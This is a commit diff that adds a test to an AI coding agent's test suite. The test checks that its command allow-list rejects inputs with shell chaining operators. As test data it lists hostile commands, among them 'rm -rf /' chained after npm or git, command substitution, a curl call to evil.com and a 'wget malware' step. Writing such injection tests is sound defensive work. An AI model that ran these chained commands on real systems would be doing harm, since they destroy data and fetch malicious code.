Short circuit allow-list check when it includes command chaining characters

2025-12-20 04:11:10 -05:00 · 2024-11-05 12:42:53 -08:00
parent 0b99347606
commit 920be6d01d
2 changed files with 30 additions and 1 deletions
--- a/src/core/tests/Cline.test.ts
+++ b/src/core/tests/Cline.test.ts
@@ -388,5 +388,23 @@ describe('Cline', () => {
            expect(cline.isAllowedCommand('')).toBe(false)
            expect(cline.isAllowedCommand('  ')).toBe(false)
        })
+
+        test('returns false for commands with chaining operators', () => {
+            const maliciousCommands = [
+                'npm install && rm -rf /',
+                'git status; dangerous-command',
+                'git log || evil-script',
+                'git status | malicious-pipe',
+                'git log $(evil-command)',
+                'git status `rm -rf /`',
+                'npm install && echo "malicious"',
+                'git status; curl http://evil.com',
+                'tsc --watch || wget malware',
+            ];
+
+            maliciousCommands.forEach(cmd => {
+                expect(cline.isAllowedCommand(cmd)).toBe(false);
+            });
+        });
    })
 });